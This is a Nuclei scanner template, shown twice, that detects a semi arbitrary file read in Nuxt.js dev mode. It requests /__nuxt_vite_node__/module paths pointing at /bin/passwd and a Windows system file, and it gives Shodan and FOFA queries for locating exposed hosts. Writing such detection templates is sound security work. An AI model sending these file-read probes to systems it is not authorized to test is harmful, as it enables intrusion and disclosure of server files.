nuclei-templates/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml

id: nuxt-js-semi-lfi

info:
  name: Semi Arbitrary File Read in Dev Mode - Nuxt.js
  author: DhiyaneshDK
  severity: medium
  reference:
    - https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/
    - https://bryces.io/blog/nuxt3
    - https://twitter.com/fofabot/status/1669339995780558849
  metadata:
    max-request: 1
    shodan-query: html:"buildAssetsDir" "nuxt"
    fofa-query: body="buildAssetsDir" && body="__nuxt"
    verified: "true"
  tags: lfi,nuxtjs

http:
  - method: GET
    path:
      - "{{BaseURL}}/__nuxt_vite_node__/module//bin/passwd"
      - "{{BaseURL}}/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"plugin":'
          - '"pluginCode":'
          - '"id":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
Create nuxt-js-semi-lfi.yaml 2023-06-17 05:16:30 +00:00			`id: nuxt-js-semi-lfi`

			`info:`
			`name: Semi Arbitrary File Read in Dev Mode - Nuxt.js`
			`author: DhiyaneshDK`
			`severity: medium`
			`reference:`
			`- https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/`
			`- https://bryces.io/blog/nuxt3`
			`- https://twitter.com/fofabot/status/1669339995780558849`
			`metadata:`
			`max-request: 1`
			`shodan-query: html:"buildAssetsDir" "nuxt"`
			`fofa-query: body="buildAssetsDir" && body="__nuxt"`
			`verified: "true"`
			`tags: lfi,nuxtjs`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/__nuxt_vite_node__/module//bin/passwd"`
			`- "{{BaseURL}}/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '"plugin":'`
			`- '"pluginCode":'`
			`- '"id":'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "application/json"`